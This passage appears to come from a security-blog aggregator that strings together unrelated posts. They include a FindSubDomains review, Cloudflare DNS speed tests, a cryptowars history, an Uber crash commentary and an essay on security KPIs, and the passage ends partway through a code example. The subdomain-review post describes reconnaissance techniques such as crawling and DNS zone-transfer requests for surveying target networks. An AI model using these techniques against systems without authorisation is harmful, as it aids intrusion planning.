On top of the search, their filters are amazing if you have to find specific information on a domain, a subdomain or its respective fields as discussed. They also have some pre-filtered results and trivia points:

  1. Top 100 sites and their subdomains: https://findsubdomains.com/world-top
  2. Sites with the highest number of subdomains: https://findsubdomains.com/top-subdomain-count
  3. Top countries with the highest number of subdomains: https://findsubdomains.com/countries
    = UNITED STATES: https://findsubdomains.com/world-top?country=US
    = INDIA: https://findsubdomains.com/world-top?country=IN
    = CHINA: https://findsubdomains.com/world-top?country=CN
  4. Top names for subdomains (my favourite) or most common subdomains: https://findsubdomains.com/top-subdomain-name-count

The last one is very handy when network-surveying a client, or when shocking a client with their own digital footprint.

FindSubDomains: Dashboard and Custom Tasks

Now, when I signed in (sign-up is easy), I was welcomed by a Dashboard showing Total, Ongoing and Remaining tasks. I can start a new task using either a domain or a word to search; the word search is great if I don't know the complete domain name. This task-execution capability supplements anything you don't find on their main page or in their existing database (which, believe me, is huge). Each task can list up to 50,000 subdomains and takes around 6 minutes (you can set up an alert, and the platform will notify you via email on completion).

To execute the task of finding subdomains, it uses various techniques:

  1. Many subdomains can be discovered by crawling the site and analyzing its pages and resource files;
  2. AXFR (DNS zone transfer) requests for some domains often reveal a lot of valuable information about them;
  3. Search and analysis of historical data often matches the search term.

While the tool is impressive (and I can't repeat that enough), I would have appreciated the capability to execute tasks via an API, along with some programmable way to automate it from the command line/terminal. I know I may find ways to do it with curl, but an API key would have made things more comfortable and convenient.
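For what it's worth, if such an API existed, I would expect the client side to look roughly like this. The endpoint path, parameter name and API-key header below are purely hypothetical, since no official API is available at the time of writing:

```python
import json
import urllib.parse
import urllib.request

def build_request(domain, api_key):
    """Build a request for a *hypothetical* FindSubDomains API endpoint."""
    query = urllib.parse.urlencode({"domain": domain})
    url = f"https://findsubdomains.com/api/v1/subdomains?{query}"  # hypothetical path
    return urllib.request.Request(url, headers={"X-Api-Key": api_key})

def fetch_subdomains(domain, api_key):
    """Fetch and decode the (hypothetical) JSON list of subdomains."""
    with urllib.request.urlopen(build_request(domain, api_key)) as resp:
        return json.load(resp)

# Usage (would require network access and a real API):
#   fetch_subdomains("apple.com", "MY-KEY")
```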

FindSubDomains: Usage Scenarios

Here are some scenarios where I can use this tool:

  1. During the pentest reconnaissance phase, collecting information on the target network.
  2. As a supporting tool to gather network intelligence on firms and their respective domains.
  3. Assessing your own company's network and digital footprint. Many times you will be surprised by the wide, unaccounted-for exposure.
  4. Keeping track of external-facing subdomains (UAT, SIT, STAGING, etc.) which ideally should be either locked down or whitelisted. Imagine how insecure these platforms are, when they often even contain production data.
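As a quick sketch of point 4, risky environment subdomains can be flagged straight from a downloaded subdomain list; the label set below is my own guess at common naming conventions, so adjust it to your environment:

```python
RISKY_LABELS = {"uat", "sit", "staging", "test", "dev"}  # assumed conventions

def flag_risky(subdomains):
    """Return subdomains whose leftmost label looks like a non-production environment."""
    return [s for s in subdomains if s.split(".")[0].lower() in RISKY_LABELS]

found = ["www.example.com", "uat.example.com", "staging.example.com"]
print(flag_risky(found))  # ['uat.example.com', 'staging.example.com']
```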

To summarize, this is yet another amazing tool after CertDB that shows the potential of the SPYSE team. FindSubDomains has made my searches much easier and more efficient, and I would highly recommend readers use it for finding subdomains.

Cover Image Credit: Photo by Himesh Kumar Behera

Cyclists Defeat Cars in Urban Speed Challenge

This should be obvious to anyone who rides a bicycle in a city. Alas we also have studies to prove it true, year after year:

Since the event began in 2009, one mode has ruled supreme in terms of speed.

“People on bikes have beaten their car-driving counterparts more than two-thirds of the time,” Jane says. “A lot of people are surprised by that, because they don’t realize how fast and convenient cycling for transportation can be.”

This is confirmed by a 2017 study from the German Federal Environmental Agency, which determined that–in an urban setting–bikes are faster than cars for trips up to five kilometres. As it turns out, drivers vastly underestimate time spent sitting in traffic, searching for parking, and walking to their final destination.

Two-thirds is a crushing defeat for cars, and that's measuring speed alone. When you add in the health and environmental benefits, it raises the question of what people really value when driving a car in a city.

Cyberspace Intervention Law and Evolving Views

I’m putting two opinion pieces by the esteemed Michael Adams together and getting an odd result.

While reflecting on "detailed analysis that is being conducted at USCYBERCOM, across agencies and at events like the Cyber Command legal conference", Michael opines that the US has taken no position on whether it would come to the aid of a victim, or side with an aggressor, when confronted with a cyberattack.

The U.S. asserts that extant international law, to include International Humanitarian Law (IHL) applies to cyberspace, but it has yet to offer definitive guidance on what cyberattacks, short of those causing obvious large scale kinetic destruction, constitute a prohibited use of force or invoke the LOAC. While the Tallinn Manual 2.0 may be the most comprehensive treatise on the applicability of international law to cyberspace thus far, it was developed without the official participation of, and has not been sanctioned by, States. The U.S. Government, for example, has taken no official position on the views set forth in the Manual.

Meanwhile, an earlier opinion piece tells us that taking action with fire-and-forget remote missiles against a far-away target, while refusing to "use the law as a shield", deserves something akin to his respect:

…from the perspective of a lawyer who has advised the highest levels of military and civilian officials on literally thousands of military operations, there is something to be said for a client that refuses to use the law as a shield for inaction and that willingly acknowledges that other factors weighed most heavily on his or her decisions.

Maybe I’m reading too much into the theme across his work here, but I get the sense that if the aggressor is far enough removed from accountability, let alone retaliation, then a long-distance attack wouldn’t bring any urge to bother with shields, including the law. This surely is the attraction of missiles and keyboards to “swivel-chair” aggressors. The perception of inaction in a lawyer’s eye is erased simply by pushing a button, even when the chance of success is as remote as the targets.

Origins of “Information Security”

I’ve promised for a while, years really, to write-up the etymology of the word “hacker”. This always is a popular topic among the information security crowd. Although I regularly talk about it at conferences and put it in my presentations, the written form has yet to materialize.

Suddenly I instead feel compelled to write about a claim to the origins of the phrase “information security”. Credit goes to the book “Code Girls” by Liza Mundy, a bizarrely inaccurate retelling of cryptography history. While I don’t mind people throwing about theories of why hacker came to be a term, for some reason Mundy’s claim about “information security” shoves me right to the keyboard; per her page 20 Introduction to the topic:

[The 1940s] were the formative days of what is now called “information security,” when countries were scrambling to develop secure communications at a time when technology was offering new ways to encipher and conceal. As in other nascent fields, like aeronautics, women were able to break in largely because the field of code breaking barely existed. It was not yet prestigious or known. There had not yet been put in place elaborate systems of regulating and credentialing–professional associations, graduate degrees, licenses, clubs, learned societies, accreditation–the kinds of barriers long used in other fields, like law and medicine, to keep women out.

First of all, the reader now expects to see evidence of these “elaborate systems of regulating and credentialing” with regard to information security. I suspect Mundy didn’t bother to check the industry because there are none. Quite the opposite, the CISSP is regularly bashed as entry-level and insufficient proof of information security qualification, and experts regularly boast of having orthogonal degrees or none at all.

Second, she’s contradicting her own narrative. Only a page earlier she holds up the field of code breaking as a “storied British operation that employed ‘debs and dons’: brilliant Oxford and Cambridge mathematicians and linguists–mostly men, but also some women…”. So which is it? Was information security not prestigious and known, or was it a “storied” field drawing on the highest caliber schools?

As an aside, I also find it frustrating that this book about recognizing the women of code breaking calls Bletchley “mostly men, but also some women”. The British operation was at first resistant to women, and the same dynamics as in the US shifted the balance, as the site itself will tell you:

The Bletchley Park codebreaking operation during World War 2 was made up of nearly 10,000 people (about 75% of this number was women). However, there are very few women of that are formally recognised as cryptanalysts working at the same level as their male peers.

Mundy dismisses this as “…there also were thousands of women, many from upper-class families, who operated ‘bombe’ machines…” almost as if she’s buying into a boorish and misogynist narrative dismissing the code breaking capabilities as “some women” and tossing out the rest as a bunch of wealthy knob turners. Who does she think went to Oxford and Cambridge? Meanwhile Bletchley historians tell us about the women “codebreaking successes and contribution to the Battle of Cape Matapan, which put the Italian Navy out of World War 2”.

Mundy also gives credit only to the British operation for breaking Enigma, which is patently false history as I’ve written about before.

So, third, she mentions the US resurrected its code breaking from WWI. This punches a hole through her theory that information security originated in the 1940s. Not only does a link to WWI indicate the field is older, it raises the question of why she would suggest such a late start date when there are also sources linking it to the US Civil War and earlier.

Enigma cracking started at the end of WWI and the Polish put their top mathematicians on it because they recognized relevance to the threat from a neighboring state, as history tends to repeat. The British focused on Spanish and Italian code-breaking in the 1930s because Franco and Mussolini were more interesting to them as threats to their domain. Mundy hints at this on page 14 when she admits information security students of the 1940s relied on earlier work:

The instructors would be given a few texts to jump-start their own education, including a work called Treatise on Cryptography, another titled Notes on Communications Security, and a pamphlet called The Contributions of the Cryptographic Bureaus in the World War–meaning World War I…

Anyway, aside from these three fundamental mistakes, a core piece missing from her analysis is that the US fell behind on code breaking and had to catch up because of isolationist tendencies as well as white supremacists in the US pressuring their country to remain neutral or even assist with Nazi aggression. Mundy mentions this briefly on page 13 and sadly doesn’t make the political connections.

[Captain, U.S.N. Laurance Frye] Safford elaborated on the qualifications they wanted by spelling out the kind of young women the Navy did not want. “We can have here no fifth columnists, nor those whose true allegiance may be to Moscow,” Safford wrote. “Pacifists would be inappropriate. Equally so would be those from persecuted nations or races–Czechoslovakians, Poles, Jews, who might feel an inward compulsion to involve the United States in war.”

Again Mundy is citing information security field expertise that existed long before the 1940s. And you have to really take in the irony of Safford’s antisemitism and political position here given that it comes after Polish cryptographers already had cracked Enigma and were the foundation to Bletchley Park focus on German cryptography. Further to the point, as the NSA history of Safford claims, he saw himself as the person who actively tried to involve the United States in war.

He recognized the signs of war that appeared in the diplomatic traffic, and tried to get a warning message to Pearl Harbor several days before the attack, but was rebuffed by Admiral Noyes, the director of Naval communication.

Several days. A bit late Safford. Imagine how many years of warning he might have had if he hadn’t demanded “persecuted nations or races” be excluded from information security roles.

America was behind because it didn’t perceive itself as a persecuted nation; it failed to expend resources on information security in a manner commensurate with the risk. There were pro-Nazi forces actively attempting to undermine or sabotage US feedback loops by pushing a head-in-sand “neutrality” position all the way to Pearl Harbor.

By the time these “America First” agents of Nazi Germany were exposed and incarcerated, women simply offered a more available home-front resource compared with men abruptly being sent to fight in the field (same as in Britain, France, Poland, etc.). Of course the women were as good as, if not better than, the men. It was procrastination and the pre-war political position of allowing aid to Nazi Germany (GM, Standard Oil, etc.) that created a desperate catch-up situation, opening the doors to women.

Information security formative days started long before the 1940s, but just like today the absence of feeling threatened led decision makers to under-invest in those who studied it, let alone those who practiced professionally without degrees or certifications. The question really is whether women would have been pulled into information security anyway, even if the US had not been under investing in the years prior. British history tells us definitively yes, as 75% of Bletchley staff were women.

Does that percentage sound high? Mundy herself says on page 20 that 70% of US Army and 80% of US Navy information security staff were women. Fortunately she doesn’t discount the Americans as wealthy knob-turners, and instead glorifies every American woman’s role as essential to the war effort. Mundy writes well, but her history analysis is lacking and sometimes even self-defeating.

Cloudflare Quad 1 DNS is privacy-centric and blazing fast


This year I have witnessed too many DNS stories, ranging from government censorship programs to privacy-centric secure DNS (DNS over TLS) meant to protect customers' queries from profiling or profiteering businesses. Some DNS services attempt to block malicious sites (IBM Quad9 DNS and SafeDNS) while others try to give unrestricted access to the world (Google DNS and Cisco OpenDNS) at low or no cost.

Yesterday, I read that Cloudflare has joined the race with its DNS service (Quad1, or 1.1.1.1), and before I dig further (#punintended) let me tell you: it's blazing fast! Initially I thought it was a classic April Fool's prank, but then Quad1 (1.1.1.1, launched on 4/1) made sense. This is not a prank, and it works just as proposed. This blog post summarizes some speed tests and highlights why it's best to use the Cloudflare Quad1 DNS.

Quad1 DNS 1.1.1.1 Speed Test

To test the query times (in milliseconds, or ms), I resolved 3 sites - cybersins.com, my girlfriend's website palunite.de, and my friend's blog namastehappiness.com - against four existing DNS services, Google DNS (8.8.8.8), OpenDNS (208.67.222.222), SafeDNS (195.46.39.39) and IBM Quad9 (9.9.9.9), plus Cloudflare Quad1 (1.1.1.1).

Website                Google DNS   OpenDNS   IBM Quad9   SafeDNS   Cloudflare
cybersins.com             158         187        43         238         6
palunite.de               365         476       233         338         3
namastehappiness.com      207         231       178         336         3

(all query times in ms)


This looks so unrealistic that I had to execute the tests again to verify; these numbers are indeed true.
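For anyone who wants to reproduce numbers like these, a raw UDP query and a stopwatch are enough. The sketch below hand-builds a minimal DNS A-record query (wire format per RFC 1035) and times one round trip; it measures a single query, so treat it as a sanity check rather than a benchmark:

```python
import socket
import struct
import time

def build_query(domain, qid=0x1234):
    # DNS header: ID, flags (recursion desired), QDCOUNT=1, AN/NS/ARCOUNT=0
    header = struct.pack(">HHHHHH", qid, 0x0100, 1, 0, 0, 0)
    # Question section: length-prefixed labels, zero terminator, QTYPE=A, QCLASS=IN
    qname = b"".join(bytes([len(p)]) + p.encode() for p in domain.split("."))
    return header + qname + b"\x00" + struct.pack(">HH", 1, 1)

def time_lookup(domain, server, timeout=2.0):
    """Return the round-trip time in milliseconds for one UDP DNS query."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        start = time.perf_counter()
        sock.sendto(build_query(domain), (server, 53))
        sock.recv(512)
        return (time.perf_counter() - start) * 1000

# Example (requires network):
#   for server in ("8.8.8.8", "208.67.222.222", "9.9.9.9", "195.46.39.39", "1.1.1.1"):
#       print(server, round(time_lookup("cybersins.com", server)), "ms")
```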

Privacy and Security with Quad1 DNS 1.1.1.1

This is the key element that has not been addressed for quite a while. The existing DNS services are not only slow, but also store logs and can profile a user based on the domains they query. They run over UDP port 53 in clear text, and are vulnerable to MITM (man-in-the-middle) attacks. Your ISP also has visibility into this clear-text traffic, and can censor or monetize you if it chooses. In a blog post last weekend, Matthew Prince, co-founder and CEO of Cloudflare, wrote:

The web should have been encrypted from the beginning. It's a bug it wasn't. We're doing what we can to fix it ... DNS itself is a 35-year-old protocol and it's showing its age. It was never designed with privacy or security in mind.

The Cloudflare Quad1 DNS overcomes this by supporting both DNS over TLS and DNS over HTTPS, which means you can set up your internal DNS server and route queries to Cloudflare over TLS or HTTPS. On the story behind choosing Quad1, or 1.1.1.1, Matthew Prince said:

But DNS resolvers inherently can't use a catchy domain because they are what have to be queried in order to figure out the IP address of a domain. It's a chicken and egg problem. And, if we wanted the service to be of help in times of crisis like the attempted Turkish coup, we needed something easy enough to remember and spraypaint on walls.

Kudos to Cloudflare for launching this service, and for committing to the privacy and security of end users by keeping only short-lived logs. Cloudflare confirmed that they see no need to write customers' IP addresses to disk, and that they will not retain logs for more than 24 hours.
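For readers who want to try the DNS-over-HTTPS side from code, Cloudflare also exposes a JSON resolver at cloudflare-dns.com/dns-query. A minimal Python sketch follows; treat the response handling as a sketch rather than a hardened client:

```python
import json
import urllib.parse
import urllib.request

DOH_ENDPOINT = "https://cloudflare-dns.com/dns-query"

def build_doh_request(name, rtype="A"):
    """Build a GET request for Cloudflare's JSON DNS-over-HTTPS API."""
    query = urllib.parse.urlencode({"name": name, "type": rtype})
    return urllib.request.Request(
        f"{DOH_ENDPOINT}?{query}",
        headers={"Accept": "application/dns-json"},  # the JSON API expects this
    )

def resolve(name, rtype="A"):
    """Return the record data from the Answer section, if any."""
    with urllib.request.urlopen(build_doh_request(name, rtype)) as resp:
        answer = json.load(resp)
    return [rec["data"] for rec in answer.get("Answer", [])]

# Example (requires network):
#   resolve("cybersins.com")
```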

Cheers and be safe.

Privacy protections are needed for government overreach, too

After the unfortunate yet predictable Facebook episode involving Cambridge Analytica, several leaders in the technology industry were quick to pledge they would never allow that kind of corporate misuse of user data.

The fine print in those pledges, of course, is the word ‘corporate,’ and it’s exposed a glaring weakness in the privacy protections that technology companies have brought to bear.

Last week at IBM Think 2018, Big Blue’s CEO Ginni Rometty stressed the importance of “data trust and responsibility” and called on not only technology companies but all enterprises to be better stewards of data. She was joined by IBM customers who echoed those remarks; for example, Lowell McAdam, chairman and CEO of Verizon Communications, said he didn’t ever want to be in the position that some Silicon Valley companies had found themselves following data misuse or exposures, lamenting that once users’ trust has been broken it can never be repaired.

Other companies piled on the Facebook controversy and played up their privacy protections for users. Speaking at a televised town hall event for MSNBC this week, Apple CEO Tim Cook called privacy “a human right” and criticized Facebook, saying he “wouldn’t be in this situation.” Apple followed Cook’s remarks by unveiling new privacy features related to the European Union’s General Data Protection Regulation.

Those pledges and actions are important, but they ignore a critical threat to privacy: government overreach. The omission of that threat might be purposeful. Verizon, for example, found itself in the crosshairs of privacy advocates in 2013 following the publication of National Security Agency (NSA) documents leaked by Edward Snowden. Those documents revealed the telecom giant was delivering American citizens’ phone records to the NSA under a secret court order for bulk surveillance.

In addition, Apple has taken heat for its decision to remove VPN and encrypted messaging apps from its App Store in China following pressure from the Chinese government. And while Tim Cook’s company deserved recognition for defending encryption from the FBI’s “going dark” effort, it should be noted that Apple (along with Google, Microsoft and of course Facebook) supported the CLOUD Act, which was recently approved by Congress and has roiled privacy activists.

The misuse of private data at the hands of greedy or unethical corporations is a serious threat to users’ security, but it’s not the only predator in the forest. Users should demand strong privacy protections from all threats, including bulk surveillance and warrantless spying, and we shouldn’t allow companies to pay lip service to privacy rights only when the aggressor is a corporate entity.

Rometty made an important statement at IBM Think when she said she believes all companies will be judged by how well they protect their users’ data. That’s true, but there should be no exemptions for what they will protect that data from, and no denials about the dangers of government overreach.

The post Privacy protections are needed for government overreach, too appeared first on Security Bytes.

What Were the CryptoWars ?

F-Secure invites our fellows to share their expertise and insights. For more posts by Fennel, click here

In a previous article, I mentioned the cryptowars against the US government in the 1990s. Some people let me know that it needed more explanation. Ask and thou shalt receive! Here is a brief history of the 1990s cryptowars and cryptography in general.

Crypto in this case refers to cryptography (not crypto-currencies like BitCoin). Cryptography is a collection of clever ways for you to protect information from prying eyes. It works by transforming the information into unreadable gobbledegook (this process is called encryption). If the cryptography is successful, only you and the people you choose can transform the gobbledegook back to plain English (this process is called decryption).

People have been using cryptography for at least 2500 years. While we normally think of generals and diplomats using cryptography to keep battle and state plans secret, it was in fact used by ordinary people from the start. Mesopotamian merchants used crypto to protect their top secret sauces, lovers in ancient India used crypto to protect their messages, and mystics in ancient Egypt used crypto to keep more personal secrets.

However, until the 1970s, cryptography was not very sophisticated. Even the technically and logistically impressive Enigma machines, used by the Nazis in their repugnant quest for Slavic slaves and Jewish genocide, were just an extreme version of one of the simplest possible encryptions: a substitution cipher. In most cases simple cryptography worked fine, because most messages were time sensitive. Even if you managed to intercept a message, it took time to work out exactly how the message was encrypted and to do the work needed to break that cryptography. By the time you finished, it was too late to use the information.
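To make “substitution cipher” concrete: each letter of the alphabet is swapped for another letter according to a fixed key. A toy Python version (the key below is an arbitrary scrambling chosen purely for illustration, and exactly this fixed-mapping property is what makes such schemes fall to frequency analysis):

```python
import string

ALPHABET = string.ascii_uppercase
KEY = "QWERTYUIOPASDFGHJKLZXCVBNM"  # a fixed scrambling of the 26 letters

ENCRYPT = str.maketrans(ALPHABET, KEY)  # A->Q, B->W, C->E, ...
DECRYPT = str.maketrans(KEY, ALPHABET)  # the inverse mapping

message = "ATTACK AT DAWN"
ciphertext = message.translate(ENCRYPT)
print(ciphertext)                     # QZZQEA QZ RQVF
print(ciphertext.translate(DECRYPT))  # ATTACK AT DAWN
```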

World War II changed the face of cryptography for multiple reasons – the first was the widespread use of radio, which meant mass interception of messages became almost guaranteed instead of a matter of chance and good police work. The second reason was computers. Initially computers meant women sitting in rows doing mind-numbing mathematical calculations. Then later came the start of computers as we know them today, which together made decryption orders of magnitude faster. The third reason was concentrated power and money being applied to surveillance across the major powers (Britain, France, Germany, Russia) leading to the professionalization and huge expansion of all the relatively new spy agencies that we know and fear today.

The result of this huge influx of money and people to the state surveillance systems in the world’s richest countries (i.e. especially the dying British Empire, and then later America’s growing unofficial empire) was a new world where those governments expected to be able to intercept and read everything. For the first time in history, the biggest governments had the technology and the resources to listen to more or less any conversation and break almost any code.

In the 1970s, a new technology came on the scene to challenge this historical anomaly: public key cryptography, invented in secret by British spies at GCHQ and later in public by a growing body of work from American university researchers Merkle, Diffie, Hellman, Rivest, Shamir, and Adleman. All cryptography before this invention relied on algorithm secrecy in some aspect – in other words, the cryptography worked by having a magical secret method known only to you and your friends. If the baddies managed to capture, guess, or work out your method, decrypting your messages would become much easier.

This is what is known as “security by obscurity” and it was a serious problem from the 1940s on. To solve this, surveillance agencies worldwide printed thousands and thousands of sheets of paper with random numbers (one-time pads) to be shipped via diplomatic courier to embassies and spies around the world. Public key cryptography changed this: the invention meant that you could share a public key with the whole world, and share the exact details of how the encryption works, but still protect your secrets. Suddenly, you only had to guard your secret key, without ever needing to share it. Suddenly it didn’t matter if someone stole your Enigma machine to see exactly how it works and to copy it. None of that would help your adversary.
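The key-pair idea can be sketched with textbook RSA and deliberately tiny primes. This is purely illustrative; real systems use enormous primes and padding schemes, and this toy version should never be used in practice:

```python
# Textbook RSA with tiny primes (the classic worked example) - illustration only
p, q = 61, 53
n = p * q                # public modulus: 3233
phi = (p - 1) * (q - 1)  # 3120
e = 17                   # public exponent: share (n, e) with the whole world
d = pow(e, -1, phi)      # private exponent: keep secret (2753); needs Python 3.8+

message = 65
ciphertext = pow(message, e, n)    # anyone can encrypt with the public key
plaintext = pow(ciphertext, d, n)  # only the private key holder can decrypt
print(ciphertext, plaintext)       # 2790 65
```

Note how nothing here is secret except d: the method, e, and n can all be published, which is precisely what made "security by obscurity" unnecessary.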

And because this was all normal mathematical research, it appeared in technical journals, could be printed out and go around the world to be used by anyone. Thus the US and UK governments’ surveillance monopoly was in unexpected danger. So what did they do? They tried to hide the research, and they treated these mathematics research papers as “munitions”. It became illegal to export these “weapons of war” outside the USA without a specific export license from the American government, just like for tanks or military aircraft.

This absurd situation persisted into the early 1990s when two new Internet-age inventions made their continued monopoly on strong cryptography untenable. Almost simultaneously, Zimmermann created a program (PGP) to make public key cryptography easy for normal people to use to protect their email and files, and Netscape created the first SSL protocols for protecting your connection to websites. In both cases, the US government tried to continue to censor and stop these efforts. Zimmermann was under constant legal threat, and Netscape was forced to make an “export-grade” SSL with dramatically weakened security. It was still illegal to download, use, or even see, these programs outside the USA.

But by then the tide had turned. People started setting up mirror websites for the software outside the USA. People started putting copies of the algorithm on their websites as a protest. Or wearing t-shirts with the working code (5 lines of Perl is all that’s needed). Or printing the algorithm on posters to put up around their universities and towns. In the great tradition of civil disobedience against injustice, geeks around the world were daring the governments to stop them, to arrest them. Both the EFF (Electronic Frontier Foundation) and the EPIC (Electronic Privacy Information Center) organizations were created as part of this fight for our basic (digital) civil rights.

In the end, the US government backed down. By the end of the 1990s, the absurd munitions laws still existed but were relaxed sufficiently to allow ordinary people to have basic cryptographic protection online. Now they could be protected when shopping at Amazon without worrying that their credit card and other information would be stolen in transit. Now they could be protected by putting their emails in an opaque envelope instead of sending all their private messages via postcard for anyone to read.

However, that wasn’t the end of the story. As in so many cases, “justice too long delayed is justice denied”. The internet has become systematically protected by encryption over the last two years thanks to the amazing work of LetsEncrypt. However, we spent almost 20 years sending most of our browsing and search requests via postcard, and that “export-grade” SSL the American government forced on Netscape in the 1990s is directly responsible for the existence of the DROWN attack, putting many systems at risk even today.

Meanwhile, thanks to the legal threats, email encryption never took off. We had to wait until the last few years for the idea of protecting everybody’s communications with cryptography to become mainstream with instant messaging applications like Signal. Even with this, the US and UK governments continue to lead the fight to stop or break this basic protection for ordinary citizens, despite the exasperated mockery from everyone who understands how cryptography works.

Self-Driving Uber Murders Pedestrian

Although it is still early in the news cycle, so far we know from Tempe police reports that an Uber robot has murdered a woman.

The Uber vehicle was reportedly headed northbound when a woman walking outside of the crosswalk was struck.

The woman was taken to the hospital where she died from her injuries.

Tempe Police says the vehicle was in autonomous mode at the time of the crash and a vehicle operator was also behind the wheel.

First, “autonomous mode” indicates to us that Uber’s engineering team must now admit their design decisions led to this easily predictable disaster of a robot taking a human life. For several years I’ve been giving talks about this exact situation, including at AppSecCali, where I recently mentioned why and how driverless cars are killing machines. Don’t forget the Uber product was already caught ignoring multiple red lights and crosswalks in SF. It was just over a year ago that major news sources issued the warning to the public.

…the self-driving car was, in fact, driving itself when it barreled through the red light, according to two Uber employees…and internal Uber documents viewed by The New York Times. All told, the mapping programs used by Uber’s cars failed to recognize six traffic lights in the San Francisco area. “In this case, the car went through a red light,” the documents said.

This doesn’t sufficiently warn pedestrians of the danger. Ignoring red lights really goes back a few months before the NYT picked up the story, into December 2016. Here you can see me highlighting the traffic signals and a pedestrian, asking for commentary on obvious ethics failures in Uber engineering. Consider how the pedestrian stepping into a crosswalk on the far right would be crossing in front of the Uber as it runs the red light:

Second, take special note of framing this new crash as a case where someone was “walking outside of the crosswalk”. That historically has been how the automobile industry exonerated drivers who murder pedestrians. A crosswalk construct was developed specifically to shift blame away from drivers going too fast, criminalizing pedestrians by reducing driver accountability to react appropriately to vulnerable people in a roadway.

Vox has an excellent write-up on how “walking outside of the crosswalk” really is “forgotten history of how automakers invented”…a crime:

…the result of an aggressive, forgotten 1920s campaign led by auto groups and manufacturers that redefined who owned the city streets.

“In the early days of the automobile, it was drivers’ job to avoid you, not your job to avoid them,” says Peter Norton, a historian at the University of Virginia and author of Fighting Traffic: The Dawn of the Motor Age in the American City. “But under the new model, streets became a place for cars — and as a pedestrian, it’s your fault if you get hit.”

Even more to the point, it was the Wheelmen cyclists of the late 1800s who campaigned for America’s paved roads. Shortly after road-building began, however, aggressive car manufacturers manipulated security issues to eliminate non-driver presence on those roads.

We’re repeating history at this point, and anyone who cites crosswalk theory in defense of an Uber robot murdering a pedestrian isn’t doing transit safety or security experts any favors. It will be interesting to see how accountability for murder plays out, as it will surely inform algorithms intended to use cars as a weapon.

Measure Security Performance, Not Policy Compliance

I started my security (post-sysadmin) career heavily focused on security policy frameworks. It took me down many roads, but everything always came back to a few simple notions, such as that policies were a means of articulating security direction, that you had to prescriptively articulate desired behaviors, and that the more detail you could put into the guidance (such as in standards, baselines, and guidelines), the better off the organization would be. Except, of course, that in the real world nobody ever took time to read the more detailed documents, Ops and Dev teams really didn't like being told how to do their jobs, and, at the end of the day, I was frequently reminded that publishing a policy document didn't translate to implementation.

Subsequently, I've spent the past 10+ years thinking about better ways to tackle policies, eventually reaching the point where I believe "less is more" and that anything written and published in a place and format that isn't "work as usual" will rarely, if ever, get implemented without a lot of downward force applied. I've seen both good and bad policy frameworks within organizations. Often they cycle around between good and bad. Someone will build a nice policy framework, it'll get implemented in a number of key places, and then it will languish from neglect and inadequate upkeep until it's irrelevant and ignored. This is not a recipe for lasting success.

Thinking about it further this week, it occurred to me that part of the problem is thinking in the old "compliance" mindset. Policies are really to blame for driving us down the checkbox-compliance path. Sure, we can easily stand back and try to dictate rules, but without the adequate authority to enforce them, and without the resources needed to continually update them, they're doomed to obsolescence. Instead, we need to move to that "security as code" mentality and find ways to directly codify requirements in ways that are naturally adapted and maintained.

End Dusty Tomes and (most) Out-of-Band Guidance

The first daunting challenge of security policy framework reform is to throw away the old, broken approach with as much gusto and finality as possible. Yes, there will always be a need for certain formally documented policies, but overall an organization Does. Not. Need. large amounts of dusty tomes providing out-of-band guidance to a non-existent audience.

Now, note a couple things here. First, there is a time and a place for providing out-of-band guidance, such as via direct training programs. However, it should be the minority of guidance, and wherever possible you should seek to codify security requirements directly into systems, applications, and environments. For a significant subset of security practices, it turns out we do not need to repeatedly consider whether or not something should be done, but can instead make the decision once and then roll it out everywhere as necessary and appropriate.
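As a concrete illustration of making the decision once and codifying it, a requirement like "all services must use TLS 1.2 or later" can become an automated check that CI runs against every service, rather than a rule buried in an out-of-band policy document. A minimal sketch in Python; the requirement, the config format, and all names here are hypothetical:

```python
# Hypothetical example: the written policy "all services must use TLS 1.2
# or later" codified as a check CI can run against service configs,
# instead of a rule living in a dusty policy tome.
MIN_TLS = (1, 2)  # the decision, made once, in one place

def tls_version_ok(version_string):
    """Return True if a config value like 'TLSv1.2' meets the minimum."""
    try:
        major, minor = version_string.replace("TLSv", "", 1).split(".")
        return (int(major), int(minor)) >= MIN_TLS
    except ValueError:
        # Anything unparseable ('SSLv3', 'TLSv1', garbage) fails the check
        return False

# A CI job could fail the build whenever any service config violates it:
configs = {"web": "TLSv1.2", "api": "TLSv1.3", "legacy": "TLSv1.0"}
violations = [name for name, ver in configs.items() if not tls_version_ok(ver)]
```

Once a check like this gates deployment, the "policy" is enforced continuously as work-as-usual, with no separate document for anyone to ignore.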

Second, we have to realize and accept that traditional policy (and related) documents only serve a formal purpose, not a practical or pragmatic purpose. Essentially, the reason you put something into writing is because a) you're required to do so (such as by regulations), or b) you're driven to do so due to ongoing infractions or the inability to directly codify requirements (for example, requirements on human behavior). What this leaves you with are requirements that can be directly implemented and that are thus easily measurable.

KPIs as Policies (et al.)

If the old ways aren't working, then it's time to take a step back and think about why that might be and what might be better going forward. I'm convinced the answer to this query lies in stretching the "security as code" notion a step further by focusing on security performance metrics for everything and everyone instead of security policies. Specifically, if you think of policies as requirements, then you should be able to recast those as metrics and key performance indicators (KPIs) that are easily measured, and in turn are easily integrated into dashboards. Moreover, going down this path takes us into a much healthier sense of quantitative reasoning, which can pay dividends for improved information risk awareness, measurement, and management.

Applied, this approach scales very nicely across the organization. Businesses already operate on a KPI model, and converting security requirements (née policies) into specific measurables at various levels of the organization means ditching the ineffective, out-of-band approach previously favored for directly specifying, measuring, and achieving desired performance objectives. Simply put, we no longer have to go out of our way to argue for people to conform to policies, but instead simply start measuring their performance and incentivize them to improve to meet performance objectives. It's then a short step to integrating security KPIs into all roles, even going so far as to establish departmental, if not whole-business, security performance objectives that are then factored into overall performance evaluations.

Examples of security policies-become-KPIs might include metrics around vulnerability and patch management, code defect reduction and remediation, and possibly even phishing-related metrics that are rolled up to the department or enterprise level. When creating security KPIs, think about the policy requirements as they're written and take time to truly understand the objectives they're trying to achieve. Convert those objectives into measurable items, and there you are on the path to KPIs as policies. For more thoughts on security metrics, I recommend checking out the CIS Benchmarks as a starting point.
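As an illustration of how directly measurable these become, a patch-management KPI like "fraction of hosts patched within a 30-day SLA" reduces to a few lines over inventory data. This is only a sketch with made-up inventory; the data shape and names are my own assumptions:

```python
from datetime import date

# Hypothetical inventory rows: (host, patch_released, patch_applied or None)
inventory = [
    ("web-01", date(2018, 6, 1), date(2018, 6, 10)),  # patched in 9 days
    ("web-02", date(2018, 6, 1), date(2018, 7, 20)),  # patched in 49 days
    ("db-01",  date(2018, 6, 1), None),               # still unpatched
]

def patch_sla_kpi(rows, sla_days=30):
    """Fraction of hosts whose patches were applied within the SLA window."""
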